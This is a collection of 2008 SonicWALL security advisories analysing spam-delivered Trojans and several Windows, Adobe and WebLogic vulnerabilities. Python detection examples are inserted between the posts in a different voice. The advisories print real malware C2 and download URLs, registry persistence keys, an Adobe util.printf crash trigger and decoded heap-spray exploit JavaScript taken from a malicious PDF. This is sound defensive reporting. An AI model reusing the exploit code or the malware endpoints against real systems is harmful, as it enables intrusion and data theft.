UPS Invoice Spam (Nov 21, 2008)

SonicWALL UTM Research team observed a new wave of the ongoing UPS invoice spam campaign starting Thursday, November 20, 2008. The email carries a zip-archived attachment containing a new ZBot Trojan variant.

SonicWALL has received more than 1,000 e-mail copies of this malware to date. The e-mail looks like the following:

Attachment: UPSInfo.zip (contains UPSInfo.exe)

Subject: Your Tracking # [12-digit number]

Email Body:
————————
Sorry, we were not able to deliver postal package you sent on November the 1st in time because the recipient's address is not correct.

Please print out the invoice copy attached and collect the package at our office. If you do not receive package in ten days you will have to pay 36$ per day.

Your UPS
————————

The executable file inside the zip attachment uses an icon disguised as an Adobe PDF file, as shown below:

screenshot

When executed, the Trojan performs the following host-level activity:

  • Creates a directory twain_32 in C:\Documents and Settings\LocalService\Application Data and C:\WINDOWS\system32
  • Drops a copy of itself as C:\WINDOWS\system32\twext.exe
  • Creates two files C:\WINDOWS\system32\twain_32\local.ds and C:\WINDOWS\system32\twain_32\user.ds

It modifies the following Registry value so that twext.exe is run:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit: "C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\twext.exe,"

It also tries to connect to the following URL and download an encrypted configuration file:

  • pavelmoous.ru/pavel/conf.bin

The Trojan is also known as Trojan-Spy.Win32.Zbot.gsv [Kaspersky], W32/Trojan3.LA [F-Prot], and TR/Spy.ZBot.gsv [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Zbot.GSV (Trojan) signature.

Airline Ticket Spam (Nov 14, 2008)

SonicWALL UTM Research team observed a new spam campaign starting on Thursday, November 13, 2008: a fake e-mail pretending to come from an airline and to contain a flight ticket. The email carries a zip-archived attachment containing a new Downloader Trojan.

The e-mail looks like the following:

Attachment: ticket.zip (contains ticket.doc .exe)

Subject:

  • Your flight ticket
  • Your ticket from Delta Airlines
  • Your ticket from Alaska Airlines
  • Your ticket from United Airlines
  • Your airplane ticket

Email Body:
————————
Dear Holder

Thank you for using our new service “Buy flight ticket Online” on our website. Your account has been created:

Your login: your-email-address
Your password: random-string

Your credit card has been charged for $WXX.YY (where W=4 and X,Y = 0-9)
We would like to remind you that whenever you order tickets on our website you get a discount of 10%!
Attached to this message is the purchase Invoice and the flight ticket.
To use your ticket, simply print it on a color printed, and you are set to take off for the journey!

Kind regards,
Airline Name (E.g. United, Alaska etc)
————————

The executable file inside the zip attachment uses an icon disguised as a Microsoft Word document, as shown below:

screenshot

When executed, the Trojan performs the following host-level activity:

  • Creates the directory C:\Program Files\Microsoft Common
  • Drops a copy of itself as C:\Program Files\Microsoft Common\wuauclt.exe
  • Deletes the original copy of the file
  • Creates multiple .sys files in the SYSTEM32\DRIVERS directory
  • Creates multiple .tmp files that are later deleted

It creates the following Registry value for itself:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger: "C:\Program Files\Microsoft Common\wuauclt.exe"

It also tries to connect to the following URLs and download files:

  • furely.ru/load2/ld.php?v=[REMOVED]168650&n=1&uid=1 [Downloads msan1.exe – detected as GAV: Wigon.HE (Trojan)]
  • kexlup.ru/loadx/ld.php?v=[REMOVED]75168650&n=1&uid=1 [connection failed]

The Trojan is also known as Trojan.Win32.Agent.amzt [Kaspersky], W32/Trojan3.JD [F-Prot], and TR/Dldr.iBill.BP [AntiVir].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: Agent.AMZT (Trojan) signature [8,344 hits recorded].

MS08-069 MS XML Core Vulnerability (Nov 12, 2008)

Microsoft has released an advisory for its XML processing framework, MSXML (Microsoft XML Core Services), as part of this month's Microsoft Patch Day. The framework may be used by developers in third-party applications as well as in applications shipped with the operating system. The most popular application using this framework is Internet Explorer, which can transform XML files using XSL stylesheets.

The XML Core Services package contains the DOMDocument ActiveX object, which represents the top level of the XML source. Document Type Definition (DTD) is one of several SGML and XML schema languages that DOMDocument can parse. DOMDocument includes members for retrieving and creating all other XML objects. One of those member methods, loadXML, loads an XML document from a supplied string. The supplied string can reference an external DTD, which resides in a separate document and is referred to by the URI of the DTD file.

An information disclosure vulnerability exists in the implementation of the DOMDocument ActiveX control. The flaw is due to a design weakness in the way XML Core Services handles error checks for external DTDs. Normally, content from one domain cannot read information from a different domain. However, vulnerable versions of MSXML allow parameter entities in external DTDs to reference data on a different domain. Successful exploitation would disclose potentially confidential cross-domain information to the attacker.
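The same-origin rule the paragraph describes can be enforced before a document is handed to a DTD-resolving parser: extract every external DTD and parameter-entity URI and reject those whose origin differs from the loading document's. The following Python is an added example, not Microsoft's or SonicWALL's code; the regexes, the function names and the constructed sample document (hosts other.example, intranet.example and www.example.com) are assumptions of the example.

```python
import re
from urllib.parse import urlparse

# The two places an external DTD URI appears: the DOCTYPE declaration and a
# parameter-entity declaration (<!ENTITY % name SYSTEM "uri"> or PUBLIC "id" "uri").
DOCTYPE_RE = re.compile(
    r'<!DOCTYPE\s+[^\s>\[]+\s+(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)")',
    re.IGNORECASE)
PARAM_ENTITY_RE = re.compile(
    r'<!ENTITY\s+%\s+\S+\s+(?:SYSTEM\s+"([^"]*)"|PUBLIC\s+"[^"]*"\s+"([^"]*)")',
    re.IGNORECASE)

DEFAULT_PORTS = {"http": 80, "https": 443}


def external_dtd_references(text):
    """All external DTD / parameter-entity URIs declared in an XML document or DTD text."""
    refs = []
    for pattern in (DOCTYPE_RE, PARAM_ENTITY_RE):
        for m in pattern.finditer(text):
            refs.append(m.group(1) or m.group(2))
    return refs


def origin(url):
    """(scheme, host, port) triple used for the same-origin comparison."""
    p = urlparse(url)
    scheme = p.scheme.lower()
    return scheme, p.hostname, p.port or DEFAULT_PORTS.get(scheme)


def cross_domain_references(text, document_url):
    """External DTD URIs whose origin differs from that of the loading document.
    Relative URIs resolve inside the document's own origin and are allowed."""
    doc_origin = origin(document_url)
    return [ref for ref in external_dtd_references(text)
            if urlparse(ref).scheme and origin(ref) != doc_origin]


# Constructed document: a cross-origin DOCTYPE, a same-origin relative
# parameter entity, and a parameter entity pointing at a third host.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE doc SYSTEM "http://other.example/evil.dtd" [
  <!ENTITY % shared SYSTEM "shared.dtd">
  <!ENTITY % remote SYSTEM "https://intranet.example/private.txt">
]>
<doc/>"""

if __name__ == "__main__":
    for ref in cross_domain_references(SAMPLE_XML, "http://www.example.com/page.xml"):
        print("blocked cross-domain DTD reference:", ref)
```

Run the check over the document itself and again over any external DTD it pulls in, since the parameter entities at issue live in that second file.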

To protect SonicWALL customers from attacks targeting this vulnerability, the SonicWALL UTM team created and released the following IPS signatures on the same day the advisory was published.

  • 1210 MS XML Core Services parseError Info Disclosure Attempt 2 (MS08-069)
  • 1209 MS XML Core Services parseError Info Disclosure Attempt 1 (MS08-069)

Adobe Reader util.printf Buffer Overflow (Nov 7, 2008)

Adobe Reader (formerly Acrobat Reader) is a ubiquitous application for viewing PDF (Portable Document Format) documents.

Since version 4.0, Acrobat includes JavaScript functionality allowing for customization and extensibility. Acrobat JavaScript is an extension of the core JavaScript which adds Acrobat-specific classes that enable the author to manage document related tasks. These classes include app, dbg, console, SOAP, ADBC, util, etc.

The util object provides the printf method, which takes a format string and the values to be formatted as arguments and returns the corresponding formatted string. For example:

   var num = 12345
   util.printf("%.2f", num)

This yields 12345.00.

A stack buffer overflow exists in Adobe Reader when parsing specially crafted PDF files. Specifically, the vulnerability is caused by a boundary error when parsing format strings containing a floating point specifier in the "util.printf()" JavaScript function. If the format string specifies a width for a floating point number, the code copies the padding spaces (0x20) into a stack-allocated buffer of fixed length. Supplying an overly large width overflows the buffer with spaces and overwrites the SEH record. For example:

   var num = 1.2
   util.printf("%5000f", num)

This causes the byte 0x20 to be copied 5000 times onto the stack, overflowing the buffer.

An attacker can exploit this vulnerability by enticing a user to open a PDF document containing a malformed floating point specifier in the "util.printf()" JavaScript function. Successful exploitation would allow arbitrary code injection and execution with the privileges of the currently logged-in user. Code injection that does not result in execution would terminate the application due to memory corruption.

To evade detection, an attacker might use obfuscation techniques. For example, one of the PDF files exploiting this vulnerability contains the following FlateDecode stream:

\x48\x89\xAC\x57\x6D\x8B\x14\x31\x0C\xFE\x2E\xF8\x27\x0E\x06\xEE
\x10\x64\xB6\x69\xD3\x19\xFC\xE4\xEE\x9E\xFF\x43\x8E\x05\x05\xF1
\xC4\x53\x7F\xBF\x4D\xFA\x96\xA4\x5D\xCF\x13\x61\x76\xE8\xA6\xE9
\xD3\xE4\xC9\x4B\x3B\x97\x5F\x1F\xBF\xDC\xFE\xFC\x7A\x79\x7A\xF8
\xF8\xED\x72\x7B\x73\xF3\xE6\x66\x49\xBF\x88\x0B\x1E\x78\xE0\x16
[…truncated]
\xE3\xC3\xED\x8F\xEF\x3F\x2F\x77\xEF\x7E\x0B\x30\x00\xDA\xDA\xDC
\xBB

which decodes to:

function main() {
    var sccs = unescape("%u03eb%ueb59%ue805%ufff8[…truncated]");

    var bgbl = unescape("%u0A0A%u0A0A");
    var slspc = 20 + sccs.length;
    while (bgbl.length < slspc) bgbl += bgbl;
    var fblk = bgbl.substring(0, slspc);
    var blk = bgbl.substring(0, bgbl.length - slspc);
    while (blk.length + slspc < 0x60000) blk = blk + blk + fblk;
    var mmy = new Array();
    for (i = 0; i < 1200; i++) { mmy[i] = blk + sccs }
    var nm = 12;
    for (i = 0; i < 18; i++) { nm = nm + "9"; }
    for (i = 0; i < 276; i++) { nm = nm + "8"; }
    util.printf("%45000f", nm);
    this.closeDoc(true);
}

app.setTimeOut("main()", 5000);
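Once the FlateDecode and escape layers have been stripped, the call that matters is easy to spot: a floating point conversion whose field width is far larger than any legitimate document would use. The following Python scanner is an added example (not SonicWALL's signature logic); the regexes, the 256-character threshold and the constructed SAMPLE_JS are assumptions of the example. padded_length uses Python's own %-formatting to show how many bytes a width-padded conversion produces, which is exactly the count the text gives for "%5000f".

```python
import re

# util.printf("<format>", ...) with either quote style; group 2 is the format string.
PRINTF_CALL_RE = re.compile(r"util\.printf\s*\(\s*(['\"])(.*?)\1", re.DOTALL)
# One printf-style conversion: flags, width, optional precision, conversion character.
SPEC_RE = re.compile(r"%([-+ 0#]*)(\d*)(?:\.(\d+))?([diufeEgGxXs])")


def oversized_float_widths(js_source, max_width=256):
    """Return (specifier, width) for every floating point conversion whose
    field width exceeds max_width. Meant to run on JavaScript after any
    FlateDecode/escape layers have already been removed."""
    findings = []
    for call in PRINTF_CALL_RE.finditer(js_source):
        for spec in SPEC_RE.finditer(call.group(2)):
            width = int(spec.group(2) or 0)
            if spec.group(4) in "feEgG" and width > max_width:
                findings.append((spec.group(0), width))
    return findings


def padded_length(fmt, value):
    """Length of the string Python's %-formatting yields for the same
    specifier, i.e. how many bytes a width-padded conversion produces."""
    return len(fmt % value)


# Constructed script: the benign call from the text beside a call using the
# 45000-wide specifier seen in the decoded sample above.
SAMPLE_JS = '''
var num = 12345;
util.printf("%.2f", num);
var nm = "12";
util.printf("%45000f", nm);
'''

if __name__ == "__main__":
    print(oversized_float_widths(SAMPLE_JS))      # [('%45000f', 45000)]
    print(padded_length("%5000f", 1.2))           # 5000
```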

SonicWALL Gateway AntiVirus provides protection against this vulnerability via GAV: PDF.util.printf.AS (Exploit) and PDF.util.printf.AS_2 (Exploit) signatures.

Obama Speech Trojan (Nov 5, 2008)

SonicWALL UTM Research team observed a new spam campaign that uses yesterday's US election as a social engineering lure to install a Trojan.

The email appears to be from news@bbc.com with the subject "Priorities for the New President". The email content is:

——————
Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.
—————

Some other subjects used are:

  • Barack Obama wins
  • Can Obama win popular vote but lose election?
  • Did Obama Win Yet?
  • Election 2008: Time lapse of U.S. counties
  • Election Center 2008 – Election Results
  • Election Night Results
  • Fear of a Black President
  • Obama win an Electoral College majority
  • Obama win Defined by Race
  • USA Election 2008 Results
  • World Welcomes Obama’s Win

The link goes to one of these fast-flux domains (bfiinwach.com, gerimumsoe.com, lopbiuemis.com, vcoenutrmsi.com, wconlinenrue.com).

If the link is clicked, Adobe_flash9.exe is served to the user. It is 31,232 bytes in size and is compressed with the ASPack executable packer. It drops itself as %Windir%\9129837.exe and drops a rootkit as %Windir%\new_drv.sys, which it installs as a new kernel-mode driver.

It also modifies the registry:

  [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] ttool = "%Windir%\9129837.exe"

so that 9129837.exe runs every time Windows starts.

The Trojan then connects over HTTP to 91.203.93.57 (hosted in Ukraine) and issues the following GET requests:

  • cgi-bin/options.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
  • cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000

It exfiltrates stolen user IDs and passwords to the above IP.

The Trojan is also known as TrojanSpy:Win32/Ursnif.gen!D (Microsoft) and Mal/Heuri-E (Sophos).

SonicWALL has released a GAV signature to protect against this threat: GAV: Games.C (Trojan).

WebLogic Apache Connector Vulnerability (Oct 30, 2008)

Oracle BEA WebLogic Server is a multi-tier Java application server platform. In a two- or three-tier application architecture, a web server receives forms or HTTP requests and passes them to application servers, which perform the actual processing. A connector is the component the web server uses to communicate with the application server. Oracle BEA WebLogic Server ships with a connector, named mod_wl, for the Apache HTTP server.

Normally an HTTP POST request is sent in one stream, unless the HTTP header Transfer-Encoding is specified. A common value of the Transfer-Encoding header is "chunked".

A buffer overflow vulnerability exists in Oracle BEA WebLogic Server's connector for the Apache HTTP server. Specifically, the vulnerability is due to improper parsing of HTTP Transfer-Encoding headers sent to the Apache web server. When a Transfer-Encoding header containing an unrecognized value is received, the WebLogic connector copies the header value into a fixed-size stack buffer using sprintf(). The vulnerable code does not verify the length of the string before copying it to the buffer.

A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted HTTP request containing an overly long Transfer-Encoding value to the vulnerable WebLogic connector. Successful exploitation would result in code injection and execution with the privileges of the service, normally "System" on Windows.
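A front-end check that mirrors what the IPS signature below looks for can be expressed in a few lines: parse the request headers and refuse any Transfer-Encoding value that is either longer than a list of coding names could reasonably be or names a transfer-coding HTTP/1.1 does not define. This Python is an added example, not mod_wl's or SonicWALL's code; the 64-byte policy limit, the function names and the two constructed requests (host www.example.com, path /app/form) are assumptions of the example.

```python
# Transfer-codings defined by HTTP/1.1 (RFC 2616, section 3.6).
KNOWN_CODINGS = {"chunked", "identity", "gzip", "compress", "deflate"}
MAX_TE_VALUE = 64   # generous upper bound for a list of coding names (example policy)


def parse_headers(raw_request):
    """Split a raw HTTP request into (request_line, [(name, value), ...])."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if line:
            name, _, value = line.partition(":")
            headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def check_transfer_encoding(raw_request):
    """Return the reasons the request should be dropped before it reaches the connector."""
    _, headers = parse_headers(raw_request)
    problems = []
    for name, value in headers:
        if name != "transfer-encoding":
            continue
        if len(value) > MAX_TE_VALUE:
            problems.append(f"Transfer-Encoding value too long ({len(value)} bytes)")
        for item in value.split(","):
            coding = item.split(";", 1)[0].strip().lower()   # drop transfer-extension parameters
            if coding and coding not in KNOWN_CODINGS:
                problems.append(f"unrecognized transfer-coding: {coding[:32]!r}")
    return problems


# Constructed requests: a normal chunked POST and one whose Transfer-Encoding
# value is oversized and unrecognized, the shape the text describes.
BENIGN_REQUEST = ("POST /app/form HTTP/1.1\r\nHost: www.example.com\r\n"
                  "Transfer-Encoding: chunked\r\n\r\n")
MALFORMED_REQUEST = ("POST /app/form HTTP/1.1\r\nHost: www.example.com\r\n"
                     "Transfer-Encoding: " + "A" * 2048 + "\r\n\r\n")

if __name__ == "__main__":
    print(check_transfer_encoding(BENIGN_REQUEST))     # []
    print(check_transfer_encoding(MALFORMED_REQUEST))  # two findings
```

Rejecting unknown codings outright is stricter than the HTTP specification requires, but it is the right trade-off for a filter sitting in front of a connector whose copy into a fixed buffer happens precisely on the unrecognized-value path.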

SonicWALL has released an IPS signature that will detect and prevent attacks targeting this vulnerability. The signature to address this vulnerability is:

  • 3596 WEB-ATTACKS Transfer-Encoding HTTP Header BO Attempt

New ZBot Trojan variant (Oct 28, 2008)

SonicWALL UTM Research team observed a new ZBot variant being spammed in the wild through an Angelina Jolie video spam campaign starting on Saturday, October 25, 2008: a fake e-mail message pretending to contain an Angelina Jolie video. The email carries a zip-archived attachment containing the new ZBot variant.

SonicWALL has received more than 10,000 e-mail copies of this malware so far. The e-mail looks like the following:

Attachment: anjelina_video.zip (contains anjelina_video.exe)

Subject: New Anje1lna Jo1ie p0rn

Email Body:
————————
Anje1lna Jo1ie p0rn video, file attached, watch him
————————

Starting October 27, 2008 the spam campaign switched to a "new eCard" theme: a fake e-mail message pretending to contain an ecard. The email carries a zip-archived attachment containing the new ZBot variant.

SonicWALL has received more than 5,000 e-mail copies of this malware so far. The e-mail looks like the following:

Attachment: ecard.zip (contains ecard.exe)

Subject: You have received an eCard

Email Body:
————————
Good day.

You have received an eCard
To pick up your eCard open attached file
We hope you enjoy you eCard.
Thank You!
————————

When executed, the Trojan drops the following malicious files in the Windows system folder:

  • twain_32\local.ds
  • twain_32\user.ds
  • twext.exe

It modifies the following registry value to ensure that twext.exe executes on system startup:

  • HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = "(System Folder Path)\userinit.exe,(System Folder Path)\twext.exe,"
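The persistence locations named across these posts (the Winlogon Userinit value here and in the UPS invoice post, the IFEO Debugger value used by the airline-ticket downloader, and the Run value used by the Obama-speech Trojan) can all be audited from an exported registry snapshot. The following Python is an added example, not SonicWALL's code; the SAMPLE_REGISTRY snapshot, the audit_* function names and the numeric-file-name heuristic for Run entries are assumptions of the example, with the path values taken from the posts above and the remaining entry made up.

```python
import ntpath

# Constructed registry snapshot ({key\valuename: data}). The key names are the
# persistence locations listed in the posts; the "Updater" entry is invented
# as a benign control.
SAMPLE_REGISTRY = {
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit":
        r"C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\system32\twext.exe,",
    r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\Debugger":
        r"C:\Program Files\Microsoft Common\wuauclt.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ttool":
        r"%Windir%\9129837.exe",
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater":
        r'"C:\Program Files\Vendor\updater.exe" /silent',
}

EXPECTED_USERINIT = "userinit.exe"   # the only program Winlogon should launch from this value


def audit_userinit(value):
    """Flag every comma-separated Userinit entry that is not userinit.exe."""
    findings = []
    for entry in (e.strip() for e in value.split(",")):
        if entry and ntpath.basename(entry).lower() != EXPECTED_USERINIT:
            findings.append(f"Userinit launches an extra program: {entry}")
    return findings


def audit_run_entry(name, data):
    """Flag Run entries whose executable has a purely numeric file name, as
    the Obama-speech Trojan's 9129837.exe does (a heuristic, not proof)."""
    command = data.strip()
    exe = command[1:].split('"', 1)[0] if command.startswith('"') else command.split()[0]
    stem, _ = ntpath.splitext(ntpath.basename(exe))
    if stem.isdigit():
        return [f"Run\\{name} starts a numerically named executable: {exe}"]
    return []


def audit_registry(snapshot):
    """Walk a {key\\valuename: data} snapshot and return human-readable findings."""
    findings = []
    for full_name, data in snapshot.items():
        key, _, value_name = full_name.rpartition("\\")
        key_l, value_l = key.lower(), value_name.lower()
        if key_l.endswith("\\winlogon") and value_l == "userinit":
            findings += audit_userinit(data)
        elif value_l == "debugger" and "\\image file execution options\\" in key_l:
            # Any Debugger value under IFEO redirects the named program to another binary.
            findings.append(f"IFEO Debugger hijack of {ntpath.basename(key)}: {data}")
        elif key_l.endswith("\\currentversion\\run"):
            findings += audit_run_entry(value_name, data)
    return findings


if __name__ == "__main__":
    for finding in audit_registry(SAMPLE_REGISTRY):
        print(finding)
```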

It also tries to connect to the opokimoki.com domain and sends the following HTTP request:

  • GET /los/cfn.bf

The Trojan is also known as Trojan-Spy.Win32.Zbot.fql [Kaspersky], Troj/Agent-IAZ [Sophos], and TrojanSpy:Win32/Zbot.gen!C [Microsoft].

SonicWALL Gateway AntiVirus provided proactive protection against this new Zbot variant via GAV: Zbot.FME (Trojan) signature [809,401 hits recorded starting Oct 25, 2008].

screenshot

MS08-067 Server Service Buffer Overflow (Oct 23, 2008)

A vulnerability has been reported in the Server service of most versions of Microsoft Windows. This service facilitates file, print, and named-pipe sharing over the network for Windows-based computers. These remote access facilities are often utilized for Remote Procedure Calls (RPC).

Calling RPC methods on a remote machine entails opening a named pipe as a file and accessing the RPC interface through a Universally Unique Identifier (UUID). Some Microsoft operating systems do not require authentication to access several named pipes. The srvsvc pipe is an alias of the ntsvcs named pipe and can be accessed through several other aliases. The srvsvc interface is registered with the UUID "4B324FC8-1670-01D3-1278-5A47BF6EE188". The interface exposes a set of functions that enumerate and configure shares, sessions and other resources on the server. Two RPC functions provided by the SRVSVC interface are listed below:

  • NetprPathCanonicalize
  • NetprPathCompare

The function NetprPathCanonicalize, with opcode 31, normalizes a path name by converting slash characters to backslash characters and removing directory traversal sequences. Another RPC function, NetprPathCompare, with opcode 32, internally calls the NetprPathCanonicalize function to normalize path names before comparing them. Thus RPC calls to NetprPathCompare also invoke NetprPathCanonicalize.

The server-side implementation of the NetprPathCanonicalize RPC function is provided by the library NETAPI32.DLL. The calling syntax of this function is as follows:

long NetprPathCanonicalize(
    [in] [string] [unique] wchar_t *ServerName,
    [in] [string] [ref] wchar_t *PathName,
    [in] long OutBufLen,
    [in] [string] [ref] wchar_t *Prefix,
    [in] [out] [ref] long *PathType,
    [in] long PathFlags
);

A stack buffer overflow vulnerability exists in the way the Server service processes the PathName argument of the NetprPathCanonicalize function. The affected code fails to properly handle cases where directory traversal sequences traverse past the root path, as in the following case:

/pathpart1/../../pathpart2

In such cases, the code internally copies the string, minus the traversal sequence and the path component that precedes it, into a calculated destination buffer. The destination buffer is found by searching for the first slash character preceding the traversal sequence. Normally this is the beginning of the source string, so normalizing the first traversal in the above example yields the following string:

/../pathpart2

Since the next traversal sequence to be normalized is not preceded by a path component, the search for the slash character preceding it incorrectly ends at a memory location in front of the designated buffer. Consequently, if a slash character happens to exist at a vulnerable location on the stack, the source string is copied to that location.

It has been observed that an attacker can manipulate the stack favourably by calling the affected RPC function twice; on the second call, the copy overwrites the designated stack buffer.
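The root cause above is a canonicalizer that locates its destination by scanning backwards for a separator and therefore has no defined behaviour when a ".." has no parent left. A safe implementation keeps the resolved segments in an explicit stack, so a traversal past the root is a condition it can detect and reject rather than an out-of-bounds search. The following Python is an added example of that design, not Microsoft's NETAPI32 code; it models only the slash conversion and dot-segment handling the text describes (no UNC prefixes, no Prefix or PathType arguments), and the function names are its own.

```python
def canonicalize_path(path, root_escape="reject"):
    """Normalize a path as the text describes NetprPathCanonicalize doing:
    forward slashes become backslashes and '.' / '..' segments are resolved.
    A '..' with no parent segment left is handled explicitly (rejected, or
    clamped at the root) instead of by searching backwards in memory for a
    separator. UNC prefixes (\\\\server\\share) are not modelled here."""
    normalized = path.replace("/", "\\")
    absolute = normalized.startswith("\\")
    resolved = []                         # explicit stack of path segments
    for segment in normalized.split("\\"):
        if segment in ("", "."):
            continue                      # doubled separator or current directory
        if segment == "..":
            if resolved:
                resolved.pop()            # ordinary traversal: drop the parent segment
            elif root_escape == "reject":
                raise ValueError(f"traversal past root in {path!r}")
            # root_escape == "clamp": a '..' at the root stays at the root
            continue
        resolved.append(segment)
    return ("\\" if absolute else "") + "\\".join(resolved)


def is_traversal_past_root(path):
    """True if normalizing the path needs a parent the path does not have,
    i.e. the exact input class the text identifies as dangerous."""
    try:
        canonicalize_path(path, root_escape="reject")
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    sample = "/pathpart1/../../pathpart2"            # the case from the text
    print(is_traversal_past_root(sample))            # True
    print(canonicalize_path(sample, root_escape="clamp"))   # \pathpart2
```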

A remote attacker can exploit this vulnerability by sending specially crafted RPC requests to an affected system. Successful exploitation may result in execution of arbitrary code on the target host with System privileges. A denial of service condition may ensue in the case of unsuccessful attacks.

SonicWALL has released two signatures which will detect and block generic exploitation attempts of this vulnerability. The following IPS signatures have been deployed to address this issue:

  • 1160 – SRVSVC NetPathCanonicalize BO Attempt 1 (MS08-067)
  • 1161 – SRVSVC NetPathCanonicalize BO Attempt 2 (MS08-067)
  • 1174 – SRVSVC NetPathCanonicalize BO Attempt 3 (MS08-067)
  • 1178 – SRVSVC NetPathCanonicalize BO Attempt 4 (MS08-067)
  • 1186 – SRVSVC NetPathCanonicalize BO Exploit 1 (MS08-067)

MS08-067 exploit in wild (Oct 23, 2008)

Today SonicWALL UTM Research team received malware samples exploiting the newly patched MS08-067 Windows Server Service vulnerability. We have received at least 10 distinct copies of this exploit malware. Filenames were n[x].exe (where [x] = 1, 2 or 3).

The malware is 397,312 bytes in size. When executed, it drops the following malicious file in the system folder:

  • sysmgr.dll

It starts a service named "sysmgr (System Maintenance Service)" and deletes the original copy of the malware from the folder where it was executed.

It tries to communicate with the following domains over HTTP:

  • summertime.1gokurimu.com
  • doradora.atzend.com
  • perlbody.t35.com
  • 59.106.145.58

The Trojan generates a URL based on the operating system and antivirus information, in the following format: IPADDRESS/test2.php?abc=A?def=B

where A is numeric and identifies the antivirus application installed, and B is also numeric and identifies the operating system. The two values vary depending on the host computer.
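The request formats recorded across these posts (the ZBot configuration downloads, the ld.php downloader calls, the options.cgi/cmd.cgi beacons of the Obama-speech Trojan and the test2.php check-in above) are distinctive enough to match in proxy logs. The following Python scanner is an added example, not SonicWALL's signature code; the rule names, the assumed log line layout, the client IPs and timestamps in SAMPLE_LOG and the benign www.example.com line are constructed, while the hosts and paths are the ones the posts list.

```python
import re
from collections import namedtuple

Rule = namedtuple("Rule", "name pattern")

# Request-path patterns distilled from the posts in this section; the rule
# names are this example's own labels, not SonicWALL signature names.
C2_RULES = [
    Rule("zbot-config-download", re.compile(r"/(?:conf\.bin|cfn\.bf)$")),
    Rule("downloader-ld-php", re.compile(r"/ld\.php\?v=\w+&n=\d+&uid=\d+$")),
    Rule("ursnif-cgi-beacon",
         re.compile(r"/cgi-bin/(?:options|cmd)\.cgi\?.*user_id=\d+.*passphrase=\w+.*socks=\d+")),
    Rule("gimmiv-test2-php", re.compile(r"/test2\.php\?abc=\d+\?def=\d+$")),
]

# Assumed log layout: "<timestamp> <client-ip> <method> <host><path>" per line.
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<host>[^/\s]+)(?P<path>/\S*)$")


def scan_proxy_log(lines):
    """Return (timestamp, client, host, rule-name) for every line matching a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE_RE.match(line.strip())
        if not m:
            continue
        for rule in C2_RULES:
            if rule.pattern.search(m["path"]):
                hits.append((m["ts"], m["client"], m["host"], rule.name))
                break   # one verdict per line
    return hits


# Constructed log: hosts and paths from the posts, client IPs and timestamps
# invented, plus one benign request that must not match.
SAMPLE_LOG = """\
2008-11-21T10:02:13Z 10.1.2.3 GET pavelmoous.ru/pavel/conf.bin
2008-11-14T09:15:44Z 10.1.2.7 GET furely.ru/load2/ld.php?v=123456&n=1&uid=1
2008-11-05T12:00:01Z 10.1.2.9 GET 91.203.93.57/cgi-bin/cmd.cgi?user_id=3311905101&version_id=5&passphrase=fkjvhsdvlksdhvlsd&socks=22539&version=125&crc=00000000
2008-10-23T08:30:00Z 10.1.2.4 GET 59.106.145.58/test2.php?abc=3?def=2
2008-11-21T10:03:00Z 10.1.2.3 GET www.example.com/index.html
"""

if __name__ == "__main__":
    for hit in scan_proxy_log(SAMPLE_LOG.splitlines()):
        print(*hit)
```

Anchoring the patterns on the request path rather than on the host is deliberate: the posts show the same malware families moving between domains and fast-flux hosts, while the CGI parameter layout stays the same.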

It also performs the following registry modifications:

  • Creates key "HKLM\System\CurrentControlSet\Services\sysmgr\Parameters".
  • Sets value "ServiceDll"="C:\WINDOWS\SYSTEM32\wbem\sysmgr.dll" in key "HKLM\System\CurrentControlSet\Services\sysmgr\Parameters".
  • Sets value "ServiceMain"="ServiceMainFunc" in key "HKLM\System\CurrentControlSet\Services\sysmgr\Parameters".
  • Creates key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SvcHost".
  • Sets value "sysmgr"="sysmgr" in key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SvcHost".
  • Sets value "I"="" in key "HKLM\System\CurrentControlSet\Services\sysmgr".
  • Sets value "DisplayName"="System Maintenance Service" in key "HKLM\System\CurrentControlSet\Services\sysmgr".

At the time of writing this malware has very low detection coverage: Win32/Gimmiv.A [Microsoft], Generic Dropper [McAfee], Mal/Generic-A [Sophos].

SonicWALL Gateway AntiVirus provides protection against this malware via GAV: MS08-067 (Exploit) signature.

SonicWALL has also released generic IPS signatures that detect and prevent attacks targeting this vulnerability. Please refer to MS08-067 Server Service Buffer Overflow (Oct 23, 2008) for a detailed description of the vulnerability.

MS Windows IPP Buffer Overflow (Oct 17, 2008)

